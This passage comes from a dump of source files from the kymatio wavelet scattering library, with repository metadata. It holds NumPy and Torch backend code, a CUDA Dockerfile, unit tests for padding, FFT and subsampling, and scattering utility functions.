Fourier performs a good subsampling\n in time\n \"\"\"\n if backend.name.endswith('_skcuda') and device == 'cpu':\n with pytest.raises(TypeError) as re:\n x_bad = torch.randn((4, 2)).cpu()\n backend.subsample_fourier(x_bad, 1)\n assert \"for CPU tensors\" in re.value.args[0]\n return\n rng = np.random.RandomState(random_state)\n J = 10\n x = rng.randn(2, 4, 2**J) + 1j * rng.randn(2, 4, 2**J)\n x_f = np.fft.fft(x, axis=-1)[..., np.newaxis]\n x_f.dtype = 'float64' # make it a vector\n x_f_th = torch.from_numpy(x_f).to(device)\n\n for j in range(J + 1):\n x_f_sub_th = backend.subsample_fourier(x_f_th, 2**j).cpu()\n x_f_sub = 
x_f_sub_th.numpy()\n x_f_sub.dtype = 'complex128'\n x_sub = np.fft.ifft(x_f_sub[..., 0], axis=-1)\n assert np.allclose(x[:, :, ::2**j], x_sub)\n\n # If we are using a GPU-only backend, make sure it raises the proper\n # errors for CPU tensors.\n if device=='cuda':\n with pytest.raises(TypeError) as te:\n x_bad = torch.randn(4).cuda()\n backend.subsample_fourier(x_bad, 1)\n assert \"should be complex\" in te.value.args[0]\n"
},
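The `test_pad_1d` gradient check above notes that reflected samples are "counted twice" in the backward pass. A short NumPy sketch of that adjoint bookkeeping, with index ranges chosen to match reflect padding that excludes the edge sample:

```python
import numpy as np

N, pl, pr = 8, 3, 2
x = np.random.randn(N)
xp = np.pad(x, (pl, pr), mode='reflect')

# Gradient of sum(xp) w.r.t. x: each sample that also appears in a reflected
# region is counted once more than the others.
g = np.ones(N)
g[1:pl + 1] += 1            # x[1..pl] are mirrored into the left padding
g[N - 1 - pr:N - 1] += 1    # x[N-1-pr..N-2] are mirrored into the right padding

assert np.isclose(xp.sum(), (g * x).sum())
```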
{
"alpha_fraction": 0.5615991353988647,
"alphanum_fraction": 0.5694860219955444,
"avg_line_length": 39.85555648803711,
"blob_id": "35305bb19e7bc4f6b78df6abe84b05f19b284289",
"content_id": "1b0878c539732deca51d12ecb55f45787d9d46e6",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3677,
"license_type": "permissive",
"max_line_length": 113,
"num_lines": 90,
"path": "/kymatio/scattering1d/frontend/numpy_frontend.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "# Authors: Mathieu Andreux, Joakim Anden, Edouard Oyallon\n# Scientific Ancestry: Joakim Anden, Mathieu Andreux, Vincent Lostanlen\n\nimport warnings\n\nfrom ...frontend.numpy_frontend import ScatteringNumPy\nfrom ..core.scattering1d import scattering1d\nfrom ..utils import precompute_size_scattering\nfrom .base_frontend import ScatteringBase1D\n\n\nclass ScatteringNumPy1D(ScatteringNumPy, ScatteringBase1D):\n def __init__(self, J, shape, Q=1, max_order=2, average=True,\n oversampling=0, vectorize=True, out_type='array', backend='numpy'):\n ScatteringNumPy.__init__(self)\n ScatteringBase1D.__init__(self, J, shape, Q, max_order, average,\n oversampling, vectorize, out_type, backend)\n ScatteringBase1D._instantiate_backend(self, 'kymatio.scattering1d.backend.')\n ScatteringBase1D.build(self)\n ScatteringBase1D.create_filters(self)\n\n def scattering(self, x):\n # basic checking, should be improved\n if len(x.shape) < 1:\n raise ValueError(\n 'Input tensor x should have at least one axis, got {}'.format(\n len(x.shape)))\n\n if not self.out_type in ('array', 'list'):\n raise RuntimeError(\"The out_type must be one of 'array' or 'list'.\")\n\n if not self.average and self.out_type == 'array' and self.vectorize:\n raise ValueError(\"Options average=False, out_type='array' and \"\n \"vectorize=True are mutually incompatible. \"\n \"Please set out_type to 'list' or vectorize to \"\n \"False.\")\n if not self.vectorize:\n warnings.warn(\"The vectorize option is deprecated and will be \"\n \"removed in version 0.3. Please set \"\n \"out_type='list' for equivalent functionality.\",\n DeprecationWarning)\n\n batch_shape = x.shape[:-1]\n signal_shape = x.shape[-1:]\n\n x = x.reshape((-1, 1) + signal_shape)\n\n # get the arguments before calling the scattering\n # treat the arguments\n if self.vectorize:\n size_scattering = precompute_size_scattering(\n self.J, self.Q, max_order=self.max_order, detail=True)\n else:\n size_scattering = 0\n\n S = scattering1d(x, self.backend.pad, self.backend.unpad, self.backend, self.J, self.psi1_f, self.psi2_f,\n self.phi_f, max_order=self.max_order, average=self.average, pad_left=self.pad_left,\n pad_right=self.pad_right, ind_start=self.ind_start, ind_end=self.ind_end,\n oversampling=self.oversampling,\n vectorize=self.vectorize,\n size_scattering=size_scattering,\n out_type=self.out_type)\n\n if self.out_type == 'array' and self.vectorize:\n scattering_shape = S.shape[-2:]\n new_shape = batch_shape + scattering_shape\n\n S = S.reshape(new_shape)\n elif self.out_type == 'array' and not self.vectorize:\n for k, v in S.items():\n # NOTE: Have to get the shape for each one since we may have\n # average == False.\n scattering_shape = v.shape[-2:]\n new_shape = batch_shape + scattering_shape\n\n S[k] = v.reshape(new_shape)\n elif self.out_type == 'list':\n for x in S:\n scattering_shape = x['coef'].shape[-1:]\n new_shape = batch_shape + scattering_shape\n\n x['coef'] = x['coef'].reshape(new_shape)\n\n return S\n\n\nScatteringNumPy1D._document()\n\n\n__all__ = ['ScatteringNumPy1D']\n"
},
{
"alpha_fraction": 0.5316846966743469,
"alphanum_fraction": 0.5672333836555481,
"avg_line_length": 22.10714340209961,
"blob_id": "a051ee4678e4268bc842dbb4e9f0b69d2248e888",
"content_id": "e724cb1ffd147044dea695ec2c68061f59b7b2cf",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 647,
"license_type": "permissive",
"max_line_length": 55,
"num_lines": 28,
"path": "/tools/Dockerfile",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "FROM nvidia/cuda:11.2.2-devel-ubuntu20.04\n\nRUN apt-get update && \\\n DEBIAN_FRONTEND=noninteractive apt-get install -y \\\n libcudnn8 \\\n python3-appdirs \\\n python3-mako \\\n python3-numpy \\\n python3-pytest \\\n python3-pytest-cov \\\n python3-pytools \\\n python3-pip \\\n python3-venv \\\n python3-yaml \\\n curl \\\n && \\\n apt-get autoremove --purge -y && \\\n apt-get autoclean -y && \\\n rm -rf /var/cache/apt/* /var/lib/apt/lists/*\n\nRUN pip3 install \\\n scipy \\\n configparser \\\n torchvision \\\n scikit-cuda \\\n cupy \\\n 'tensorflow-gpu>=2.0.0a0' \\\n scikit-learn\n"
},
{
"alpha_fraction": 0.7341772317886353,
"alphanum_fraction": 0.7594936490058899,
"avg_line_length": 25.33333396911621,
"blob_id": "2e80a22e3ac8fcf5a7967a015bdff87cff7ee411",
"content_id": "166d79b4e3d270371e190fa650880cb54d38549b",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 79,
"license_type": "permissive",
"max_line_length": 45,
"num_lines": 3,
"path": "/kymatio/scattering1d/__init__.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "from .frontend.entry import ScatteringEntry1D\n\n__all__ = ['ScatteringEntry1D']\n"
},
{
"alpha_fraction": 0.6083915829658508,
"alphanum_fraction": 0.6373626589775085,
"avg_line_length": 30.77777862548828,
"blob_id": "8311b49168be31377326465a12615868882b55cf",
"content_id": "20900955f24bcc31d802e9bbcba47bdee995de70",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2002,
"license_type": "permissive",
"max_line_length": 87,
"num_lines": 63,
"path": "/tests/scattering1d/test_utils_scattering1d.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pytest\nfrom kymatio import Scattering1D\nfrom kymatio.scattering1d.frontend.torch_frontend import ScatteringTorch1D\nfrom kymatio.scattering1d.utils import compute_border_indices, compute_padding\n\n\ndef test_compute_padding():\n \"\"\"\n Test the compute_padding function\n \"\"\"\n\n pad_left, pad_right = compute_padding(5, 16)\n assert pad_left == 8 and pad_right == 8\n\n with pytest.raises(ValueError) as ve:\n _, _ = compute_padding(3, 16)\n assert \"should be larger\" in ve.value.args[0]\n\n with pytest.raises(ValueError) as ve:\n _, _ = compute_padding(6, 16)\n assert \"Too large padding value\" in ve.value.args[0]\n\n\ndef test_border_indices(random_state=42):\n \"\"\"\n Tests whether the border indices to unpad are well computed\n \"\"\"\n rng = np.random.RandomState(random_state)\n J_signal = 10 # signal lives in 2**J_signal\n J = 6 # maximal subsampling\n\n T = 2**J_signal\n\n i0 = rng.randint(0, T // 2 + 1, 1)[0]\n i1 = rng.randint(i0 + 1, T, 1)[0]\n\n x = np.ones(T)\n x[i0:i1] = 0.\n\n ind_start, ind_end = compute_border_indices(J, i0, i1)\n\n for j in range(J + 1):\n assert j in ind_start.keys()\n assert j in ind_end.keys()\n x_sub = x[::2**j]\n # check that we did take the strict interior\n assert np.max(x_sub[ind_start[j]:ind_end[j]]) == 0.\n # check that we have not forgotten points\n if ind_start[j] > 0:\n assert np.min(x_sub[:ind_start[j]]) > 0.\n if ind_end[j] < x_sub.shape[-1]:\n assert np.min(x_sub[ind_end[j]:]) > 0.\n\n\n# Check that the default frontend is numpy and that errors are correctly launched.\ndef test_scattering1d_frontend():\n scattering = Scattering1D(2, shape=(10, ))\n assert isinstance(scattering, ScatteringTorch1D), 'could not be correctly imported'\n\n with pytest.raises(RuntimeError) as ve:\n scattering = Scattering1D(2, shape=(10,), frontend='doesnotexist')\n assert \"is not valid\" in ve.value.args[0]\n"
},
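The `test_border_indices` case above only constrains the output of `compute_border_indices`; one implementation consistent with its "strict interior" assertions is inward (ceiling) halving of both boundaries at each scale. The sketch below is a plausible reconstruction under that assumption, not necessarily kymatio's exact code.

```python
import math

def border_indices(J, i0, i1):
    # Track unpadding boundaries through J factor-2 subsamplings, rounding
    # inward so that only the strict interior of the support survives.
    ind_start, ind_end = {0: i0}, {0: i1}
    for j in range(1, J + 1):
        ind_start[j] = math.ceil(ind_start[j - 1] / 2)
        ind_end[j] = math.ceil(ind_end[j - 1] / 2)
    return ind_start, ind_end

s, e = border_indices(3, i0=10, i1=100)
print(s)  # {0: 10, 1: 5, 2: 3, 3: 2}
print(e)  # {0: 100, 1: 50, 2: 25, 3: 13}
```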
{
"alpha_fraction": 0.7971698045730591,
"alphanum_fraction": 0.8113207817077637,
"avg_line_length": 29.285715103149414,
"blob_id": "612fde7ac1cddedd509d6753443c0f525b05d1d7",
"content_id": "8681992fecb5e466fabc7b467e80646ca358fc06",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 424,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 14,
"path": "/kymatio/scattering1d/frontend/sklearn_frontend.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "from ...frontend.sklearn_frontend import ScatteringTransformerMixin\nfrom ...numpy import Scattering1D as ScatteringNumPy1D\n\n\n# NOTE: Order in base classes matters here, since we want the sklearn-specific\n# documentation parameters to take precedence over NP.\nclass ScatteringTransformer1D(ScatteringTransformerMixin, ScatteringNumPy1D):\n pass\n\n\nScatteringTransformer1D._document()\n\n\n__all__ = ['ScatteringTransformer1D']\n"
},
{
"alpha_fraction": 0.500292181968689,
"alphanum_fraction": 0.5408437252044678,
"avg_line_length": 30.116363525390625,
"blob_id": "9568f8961d98e446ca170e014f44a5a6f524c84d",
"content_id": "46798204a9d2e623b68704648330f33686694dad",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8557,
"license_type": "permissive",
"max_line_length": 96,
"num_lines": 275,
"path": "/tests/scattering2d/test_numpy_scattering2d.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "import os\nimport io\nimport numpy as np\nfrom kymatio import Scattering2D\nfrom collections import namedtuple\nimport pytest\n\n\nbackends = []\n\nfrom kymatio.scattering2d.backend.numpy_backend import backend\nbackends.append(backend)\n\n\nclass TestPad:\n @pytest.mark.parametrize('backend', backends)\n def test_Pad(self, backend):\n pad = backend.Pad((2, 2, 2, 2), (4, 4))\n\n x = np.random.randn(4, 4) + 1J * np.random.randn(4, 4)\n x = x[np.newaxis, ...]\n\n z = pad(x)\n\n assert z.shape == (1, 8, 8)\n assert z[0, 2, 2] == x[0, 0, 0]\n assert z[0, 1, 0] == x[0, 1, 2]\n assert z[0, 1, 1] == x[0, 1, 1]\n assert z[0, 1, 2] == x[0, 1, 0]\n assert z[0, 1, 3] == x[0, 1, 1]\n\n @pytest.mark.parametrize('backend', backends)\n def test_unpad(self, backend):\n x = np.random.randn(4, 4) + 1J * np.random.randn(4, 4)\n\n y = backend.unpad(x)\n\n assert y.shape == (2, 2)\n assert y[0, 0] == x[1, 1]\n assert y[0, 1] == x[1, 2]\n\n\nclass TestModulus:\n @pytest.mark.parametrize('backend', backends)\n def test_Modulus(self, backend):\n modulus = backend.modulus\n\n x = np.random.rand(100, 10, 4) + 1J * np.random.rand(100, 10, 4)\n\n y = modulus(x)\n u = np.squeeze(np.sqrt(np.real(x) ** 2 + np.imag(x) ** 2))\n v = y\n assert np.allclose(u, v)\n\n\nclass TestSubsampleFourier:\n @pytest.mark.parametrize('backend', backends)\n def test_SubsampleFourier(self, backend):\n subsample_fourier = backend.subsample_fourier\n\n x = (np.random.rand(100, 128, 128)\n + 1J * np.random.rand(100, 128, 128))\n\n y = np.zeros((100, 8, 8), dtype=np.complex128)\n\n from itertools import product\n for i, j in product(range(8), range(8)):\n for m, n in product(range(16), range(16)):\n y[..., i, j] += x[..., i + m * 8, j + n * 8]\n\n y /= 16 ** 2\n\n z = subsample_fourier(x, k=16)\n assert np.allclose(y, z)\n\n\nclass TestCDGMM:\n @pytest.fixture(params=(False, True))\n def data(self, request):\n real_filter = request.param\n x = (np.random.randn(100, 128, 128)\n + 1J * np.random.randn(100, 128, 128))\n filt = (np.random.randn(128, 128)\n + 1J * np.random.randn(128, 128))\n y = (np.random.randn(100, 128, 128)\n + 1J * np.random.randn(100, 128, 128))\n\n if real_filter:\n filt = np.real(filt)\n\n y = x * filt\n\n return x, filt, y\n\n @pytest.mark.parametrize('backend', backends)\n @pytest.mark.parametrize('inplace', (False, True))\n def test_cdgmm_forward(self, data, backend, inplace):\n x, filt, y = data\n\n z = backend.cdgmm(x, filt, inplace=inplace)\n\n assert np.allclose(y, z)\n\n @pytest.mark.parametrize('backend', backends)\n def test_cdgmm_exceptions(self, backend):\n with pytest.raises(TypeError) as record:\n backend.cdgmm(np.empty((3, 4, 5)).astype(np.float64),\n np.empty((4, 5)).astype(np.complex128))\n assert 'first input must be complex' in record.value.args[0]\n\n with pytest.raises(TypeError) as record:\n backend.cdgmm(np.empty((3, 4, 5)).astype(np.complex128),\n np.empty((4, 5)).astype(np.int64))\n assert 'second input must be complex or real' in record.value.args[0]\n\n with pytest.raises(RuntimeError) as record:\n backend.cdgmm(np.empty((3, 4, 5)).astype(np.complex128),\n np.empty((4, 6)).astype(np.complex128))\n assert 'not compatible for multiplication' in record.value.args[0]\n\n\nclass TestFFT:\n @pytest.mark.parametrize('backend', backends)\n def test_fft(self, backend):\n x = np.random.randn(2, 2) + 1J * np.random.randn(2, 2)\n\n y = np.array([[x[0, 0] + x[0, 1] + x[1, 0] + x[1, 1],\n x[0, 0] - x[0, 1] + x[1, 0] - x[1, 1]],\n [x[0, 0] + x[0, 1] - x[1, 0] - x[1, 1],\n x[0, 0] - x[0, 1] - x[1, 0] + 
x[1, 1]]])\n\n z = backend.fft(x, direction='C2C')\n\n assert np.allclose(y, z)\n\n z = backend.fft(x, direction='C2C', inverse=True)\n\n z = z * 4\n\n assert np.allclose(y, z)\n\n z = backend.fft(x, direction='C2R', inverse=True)\n\n z = z * 4\n\n assert not np.iscomplexobj(z)\n assert np.allclose(np.real(y), z)\n\n\n @pytest.mark.parametrize('backend', backends)\n def test_fft_exceptions(self, backend):\n with pytest.raises(RuntimeError) as record:\n backend.fft(np.empty((2, 2)), direction='C2R',\n inverse=False)\n assert 'done with an inverse' in record.value.args[0]\n\n\nclass TestBackendUtils:\n @pytest.mark.parametrize('backend', backends)\n def test_concatenate(self, backend):\n x = np.random.randn(3, 6, 6) + 1J * np.random.randn(3, 6, 6)\n y = np.random.randn(3, 6, 6) + 1J * np.random.randn(3, 6, 6)\n z = np.random.randn(3, 6, 6) + 1J * np.random.randn(3, 6, 6)\n\n w = backend.concatenate((x, y, z))\n\n assert w.shape == (x.shape[0],) + (3,) + (x.shape[-2:])\n assert np.allclose(w[:, 0, ...], x)\n assert np.allclose(w[:, 1, ...], y)\n assert np.allclose(w[:, 2, ...], z)\n\n\nclass TestScattering2DNumpy:\n @pytest.mark.parametrize('backend', backends)\n def test_Scattering2D(self, backend):\n test_data_dir = os.path.dirname(__file__)\n data = None\n with open(os.path.join(test_data_dir, 'test_data_2d.npz'), 'rb') as f:\n buffer = io.BytesIO(f.read())\n data = np.load(buffer)\n\n x = data['x']\n S = data['Sx']\n J = data['J']\n pre_pad = data['pre_pad']\n\n M = x.shape[2]\n N = x.shape[3]\n\n scattering = Scattering2D(J, shape=(M, N), pre_pad=pre_pad,\n frontend='numpy', backend=backend)\n\n x = x\n S = S\n Sg = scattering(x)\n assert np.allclose(Sg, S)\n\n scattering = Scattering2D(J, shape=(M, N), pre_pad=pre_pad,\n max_order=1, frontend='numpy',\n backend=backend)\n\n S1x = scattering(x)\n assert np.allclose(S1x, S[..., :S1x.shape[-3], :, :])\n\n @pytest.mark.parametrize('backend', backends)\n def test_batch_shape_agnostic(self, backend):\n J = 3\n L = 8\n shape = (32, 32)\n\n shape_ds = tuple(n // (2 ** J) for n in shape)\n\n S = Scattering2D(J, shape, L, backend=backend, frontend='numpy')\n\n x = np.zeros(shape)\n\n Sx = S(x)\n\n assert len(Sx.shape) == 3\n assert Sx.shape[-2:] == shape_ds\n\n n_coeffs = Sx.shape[-3]\n\n test_shapes = ((1,) + shape, (2,) + shape, (2, 2) + shape,\n (2, 2, 2) + shape)\n\n for test_shape in test_shapes:\n x = np.zeros(test_shape)\n\n Sx = S(x)\n\n assert len(Sx.shape) == len(test_shape) + 1\n assert Sx.shape[-2:] == shape_ds\n assert Sx.shape[-3] == n_coeffs\n assert Sx.shape[:-3] == test_shape[:-2]\n\n @pytest.mark.parametrize('backend', backends)\n def test_scattering2d_errors(self, backend):\n S = Scattering2D(3, (32, 32), frontend='numpy', backend=backend)\n\n with pytest.raises(TypeError) as record:\n S(None)\n assert 'input should be' in record.value.args[0]\n\n x = np.random.randn(32)\n\n with pytest.raises(RuntimeError) as record:\n S(x)\n assert 'have at least two dimensions' in record.value.args[0]\n\n x = np.random.randn(31, 31)\n\n with pytest.raises(RuntimeError) as record:\n S(x)\n assert 'NumPy array must be of spatial size' in record.value.args[0]\n\n S = Scattering2D(3, (32, 32), pre_pad=True, frontend='numpy',\n backend=backend)\n\n with pytest.raises(RuntimeError) as record:\n S(x)\n assert 'Padded array must be of spatial size' in record.value.args[0]\n\n\n def test_inputs(self):\n fake_backend = namedtuple('backend', ['name',])\n fake_backend.name = 'fake'\n\n with pytest.raises(ImportError) as ve:\n scattering = 
Scattering2D(2, shape=(10, 10), frontend='numpy', backend=fake_backend)\n assert 'not supported' in ve.value.args[0]\n\n with pytest.raises(RuntimeError) as ve:\n scattering = Scattering2D(10, shape=(10, 10), frontend='numpy')\n assert 'smallest dimension' in ve.value.args[0]\n"
},
{
"alpha_fraction": 0.6403061151504517,
"alphanum_fraction": 0.6444515585899353,
"avg_line_length": 32.01052474975586,
"blob_id": "995d6e07ae7fc1e5788168c6273950e654ac3a64",
"content_id": "868e1cb25b78ed7e27c90f5be3b6c4c43125778f",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3136,
"license_type": "permissive",
"max_line_length": 99,
"num_lines": 95,
"path": "/kymatio/scattering3d/backend/torch_skcuda_backend.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "import torch\nimport warnings\nfrom skcuda import cublas\n\nBACKEND_NAME = 'torch_skcuda'\n\nfrom collections import namedtuple\n\n\ndef _is_complex(input):\n return input.shape[-1] == 2\n\n\ndef cdgmm3d(A, B, inplace=False):\n \"\"\"Complex pointwise multiplication.\n\n Complex pointwise multiplication between (batched) tensor A and tensor B.\n\n Parameters\n ----------\n A : torch tensor\n Complex torch tensor.\n B : torch tensor\n Complex of the same size as A.\n inplace : boolean, optional\n If set True, all the operations are performed inplace.\n\n Raises\n ------\n RuntimeError\n In the event that the tensors are not compatibile for multiplication\n (i.e. the final four dimensions of A do not match with the dimensions\n of B), or in the event that B is not complex, or in the event that the\n type of A and B are not the same.\n TypeError\n In the event that x is not complex i.e. does not have a final dimension\n of 2, or in the event that both tensors are not on the same device.\n\n Returns\n -------\n output : torch tensor\n Torch tensor of the same size as A containing the result of the\n elementwise complex multiplication of A with B.\n\n \"\"\"\n if not A.is_contiguous():\n warnings.warn(\"cdgmm3d: tensor A is converted to a contiguous array\")\n A = A.contiguous()\n if not B.is_contiguous():\n warnings.warn(\"cdgmm3d: tensor B is converted to a contiguous array\")\n B = B.contiguous()\n\n if A.shape[-4:] != B.shape:\n raise RuntimeError('The filters are not compatible for multiplication.')\n\n if not _is_complex(A) or not _is_complex(B):\n raise TypeError('The input, filter and output should be complex.')\n\n if B.ndimension() != 4:\n raise RuntimeError('The filters must be simply a complex array.')\n\n if type(A) is not type(B):\n raise RuntimeError('A and B should be same type.')\n\n if not A.is_cuda:\n raise RuntimeError('Use the torch backend for CPU tensors.')\n\n C = A.new(A.shape) if not inplace else A\n m, n = B.nelement() // 2, A.nelement() // B.nelement()\n lda = m\n ldc = m\n incx = 1\n handle = torch.cuda.current_blas_handle()\n stream = torch.cuda.current_stream()._as_parameter_\n cublas.cublasSetStream(handle, stream)\n cublas.cublasCdgmm(handle, 'l', m, n, A.data_ptr(), lda, B.data_ptr(), incx, C.data_ptr(), ldc)\n return C\n\n\nfrom .torch_backend import complex_modulus\nfrom .torch_backend import fft\nfrom .torch_backend import modulus_rotation\nfrom .torch_backend import compute_integrals\nfrom .torch_backend import concatenate\n\nbackend = namedtuple('backend', ['name', 'cdgmm3d', 'fft', 'modulus', 'modulus_rotation',\n 'compute_integrals', 'concatenate'])\n\nbackend.name = 'torch_skcuda'\nbackend.cdgmm3d = cdgmm3d\nbackend.fft = fft\nbackend.concatenate = concatenate\nbackend.modulus = complex_modulus\nbackend.modulus_rotation = modulus_rotation\nbackend.compute_integrals = compute_integrals\n"
},
{
"alpha_fraction": 0.6475409865379333,
"alphanum_fraction": 0.6639344096183777,
"avg_line_length": 29.5,
"blob_id": "092075b55893afa14365e699e8f64d98fba87858",
"content_id": "019bf67db14fc55be434dabc646b22ef9592a079",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 244,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 8,
"path": "/kymatio/scattering1d/frontend/entry.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "from ...frontend.entry import ScatteringEntry\n\nclass ScatteringEntry1D(ScatteringEntry):\n def __init__(self, *args, **kwargs):\n super().__init__(name='1D', class_name='scattering1d', *args, **kwargs)\n\n\n__all__ = ['ScatteringEntry1D']\n"
},
{
"alpha_fraction": 0.5673875212669373,
"alphanum_fraction": 0.5856308341026306,
"avg_line_length": 33.9713249206543,
"blob_id": "c3eaaccd00f6cf0f614b3ba59cf0097644d77901",
"content_id": "adc8fca9a9ceb9837ae5ea95e1bee98954212fe9",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9757,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 279,
"path": "/kymatio/scattering1d/utils.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport math\nfrom .filter_bank import scattering_filter_factory, calibrate_scattering_filters\n\ndef compute_border_indices(J, i0, i1):\n \"\"\"\n Computes border indices at all scales which correspond to the original\n signal boundaries after padding.\n\n At the finest resolution,\n original_signal = padded_signal[..., i0:i1].\n This function finds the integers i0, i1 for all temporal subsamplings\n by 2**J, being conservative on the indices.\n\n Parameters\n ----------\n J : int\n maximal subsampling by 2**J\n i0 : int\n start index of the original signal at the finest resolution\n i1 : int\n end index (excluded) of the original signal at the finest resolution\n\n Returns\n -------\n ind_start, ind_end: dictionaries with keys in [0, ..., J] such that the\n original signal is in padded_signal[ind_start[j]:ind_end[j]]\n after subsampling by 2**j\n \"\"\"\n ind_start = {0: i0}\n ind_end = {0: i1}\n for j in range(1, J + 1):\n ind_start[j] = (ind_start[j - 1] // 2) + (ind_start[j - 1] % 2)\n ind_end[j] = (ind_end[j - 1] // 2) + (ind_end[j - 1] % 2)\n return ind_start, ind_end\n\ndef compute_padding(J_pad, T):\n \"\"\"\n Computes the padding to be added on the left and on the right\n of the signal.\n\n It should hold that 2**J_pad >= T\n\n Parameters\n ----------\n J_pad : int\n 2**J_pad is the support of the padded signal\n T : int\n original signal support size\n\n Returns\n -------\n pad_left: amount to pad on the left (\"beginning\" of the support)\n pad_right: amount to pad on the right (\"end\" of the support)\n \"\"\"\n T_pad = 2**J_pad\n if T_pad < T:\n raise ValueError('Padding support should be larger than the original' +\n 'signal size!')\n to_add = 2**J_pad - T\n pad_left = to_add // 2\n pad_right = to_add - pad_left\n if max(pad_left, pad_right) >= T:\n raise ValueError('Too large padding value, will lead to NaN errors')\n return pad_left, pad_right\n\ndef compute_minimum_support_to_pad(T, J, Q, criterion_amplitude=1e-3,\n normalize='l1', r_psi=math.sqrt(0.5),\n sigma0=1e-1, alpha=5., P_max=5, eps=1e-7):\n\n\n \"\"\"\n Computes the support to pad given the input size and the parameters of the\n scattering transform.\n\n Parameters\n ----------\n T : int\n temporal size of the input signal\n J : int\n scale of the scattering\n Q : int\n number of wavelets per octave\n normalize : string, optional\n normalization type for the wavelets.\n Only `'l2'` or `'l1'` normalizations are supported.\n Defaults to `'l1'`\n criterion_amplitude: float `>0` and `<1`, optional\n Represents the numerical error which is allowed to be lost after\n convolution and padding.\n The larger criterion_amplitude, the smaller the padding size is.\n Defaults to `1e-3`\n r_psi : float, optional\n Should be `>0` and `<1`. 
Controls the redundancy of the filters\n (the larger r_psi, the larger the overlap between adjacent\n wavelets).\n Defaults to `sqrt(0.5)`.\n sigma0 : float, optional\n parameter controlling the frequential width of the\n low-pass filter at J_scattering=0; at a an absolute J_scattering,\n it is equal to :math:`\\\\frac{\\\\sigma_0}{2^J}`.\n Defaults to `1e-1`.\n alpha : float, optional\n tolerance factor for the aliasing after subsampling.\n The larger the alpha, the more conservative the value of maximal\n subsampling is.\n Defaults to `5`.\n P_max : int, optional\n maximal number of periods to use to make sure that the Fourier\n transform of the filters is periodic.\n `P_max = 5` is more than enough for double precision.\n Defaults to `5`.\n eps : float, optional\n required machine precision for the periodization (single\n floating point is enough for deep learning applications).\n Defaults to `1e-7`.\n\n Returns\n -------\n min_to_pad: int\n minimal value to pad the signal on one size to avoid any\n boundary error.\n \"\"\"\n J_tentative = int(np.ceil(np.log2(T)))\n _, _, _, t_max_phi = scattering_filter_factory(\n J_tentative, J, Q, normalize=normalize, to_torch=False,\n max_subsampling=0, criterion_amplitude=criterion_amplitude,\n r_psi=r_psi, sigma0=sigma0, alpha=alpha, P_max=P_max, eps=eps)\n min_to_pad = 3 * t_max_phi\n return min_to_pad\n\n\ndef precompute_size_scattering(J, Q, max_order=2, detail=False):\n \"\"\"Get size of the scattering transform\n\n The number of scattering coefficients depends on the filter\n configuration and so can be calculated using a few of the scattering\n transform parameters.\n\n Parameters\n ----------\n J : int\n The maximum log-scale of the scattering transform.\n In other words, the maximum scale is given by `2**J`.\n Q : int >= 1\n The number of first-order wavelets per octave.\n Second-order wavelets are fixed to one wavelet per octave.\n max_order : int, optional\n The maximum order of scattering coefficients to compute.\n Must be either equal to `1` or `2`. Defaults to `2`.\n detail : boolean, optional\n Specifies whether to provide a detailed size (number of coefficient\n per order) or an aggregate size (total number of coefficients).\n\n Returns\n -------\n size : int or tuple\n If `detail` is `False`, returns the number of coefficients as an\n integer. 
If `True`, returns a tuple of size `max_order` containing\n the number of coefficients in each order.\n \"\"\"\n sigma_low, xi1, sigma1, j1, xi2, sigma2, j2 = \\\n calibrate_scattering_filters(J, Q)\n\n size_order0 = 1\n size_order1 = len(xi1)\n size_order2 = 0\n for n1 in range(len(xi1)):\n for n2 in range(len(xi2)):\n if j2[n2] > j1[n1]:\n size_order2 += 1\n if detail:\n if max_order == 2:\n return size_order0, size_order1, size_order2\n else:\n return size_order0, size_order1\n else:\n if max_order == 2:\n return size_order0 + size_order1 + size_order2\n else:\n return size_order0 + size_order1\n\n\ndef compute_meta_scattering(J, Q, max_order=2):\n \"\"\"Get metadata on the transform.\n\n This information specifies the content of each scattering coefficient,\n which order, which frequencies, which filters were used, and so on.\n\n Parameters\n ----------\n J : int\n The maximum log-scale of the scattering transform.\n In other words, the maximum scale is given by `2**J`.\n Q : int >= 1\n The number of first-order wavelets per octave.\n Second-order wavelets are fixed to one wavelet per octave.\n max_order : int, optional\n The maximum order of scattering coefficients to compute.\n Must be either equal to `1` or `2`. Defaults to `2`.\n\n Returns\n -------\n meta : dictionary\n A dictionary with the following keys:\n\n - `'order`' : tensor\n A Tensor of length `C`, the total number of scattering\n coefficients, specifying the scattering order.\n - `'xi'` : tensor\n A Tensor of size `(C, max_order)`, specifying the center\n frequency of the filter used at each order (padded with NaNs).\n - `'sigma'` : tensor\n A Tensor of size `(C, max_order)`, specifying the frequency\n bandwidth of the filter used at each order (padded with 